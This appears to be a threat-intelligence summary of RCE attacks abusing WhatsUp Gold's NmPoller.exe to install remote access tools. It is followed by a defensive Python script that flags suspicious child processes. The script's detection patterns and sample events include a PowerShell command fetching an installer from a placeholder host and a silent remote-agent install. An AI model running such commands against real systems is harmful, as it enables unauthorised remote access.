Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY:

Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30. These attacks possibly leveraged the vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply the patches quickly, leading to incidents immediately following the PoC's publication. Attackers abused NmPoller.exe to execute PowerShell scripts, downloading various remote access tools and attempting to gain persistence. Mitigation steps include keeping services under access control, applying patches immediately, and monitoring suspicious process creation events in WhatsUp Gold environments.
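
The process-creation monitoring recommended in the summary, sketched as an added example (not detection content from Trend Micro or the vendor): it scores events whose parent process is NmPoller.exe. The Sysmon-style field names, the child-process list, the download patterns and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: events use Sysmon Event ID 1 field names (ParentImage, Image, CommandLine).
POLLER = "nmpoller.exe"  # WhatsUp Gold process named in the summary
# Assumed set of child processes worth flagging under the poller.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}
RAT_MARKERS = ("atera", "splashtop", "radmin")  # tools from the page's labels
# Assumed download indicators for PowerShell command lines.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|https?://",
    re.I)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path or "")[-1].lower()

def score_event(ev):
    """Return (severity, reasons) for one process-creation event."""
    if basename(ev.get("ParentImage")) != POLLER:
        return "none", []
    child, cmd = basename(ev.get("Image")), ev.get("CommandLine") or ""
    reasons = []
    if child in SCRIPT_HOSTS:
        reasons.append(f"{POLLER} spawned {child}")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("command line fetches remote content")
    hits = [m for m in RAT_MARKERS if m in cmd.lower()]
    if hits:
        reasons.append("remote access tool reference: " + ", ".join(hits))
    if not reasons:
        return "none", []
    return ("high" if len(reasons) >= 2 else "review"), reasons

# Constructed sample events (paths and URL are placeholders, not from any incident).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\App\NmPoller.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command iwr -Uri http://example.invalid/a.msi -OutFile a.msi"},
    {"ParentImage": r"C:\App\NmPoller.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Temp\AteraAgent.msi /qn"},
    {"ParentImage": r"C:\App\NmPoller.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev), ev["CommandLine"])
```

Events scored `review` are a starting point for baselining what the poller legitimately launches in a given environment before alerting on them.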

OPENCTI LABELS:

atera agent,cve-2024-6670,remote access tools,splashtop remote,whatsup gold,radmin,cve-2024-6671

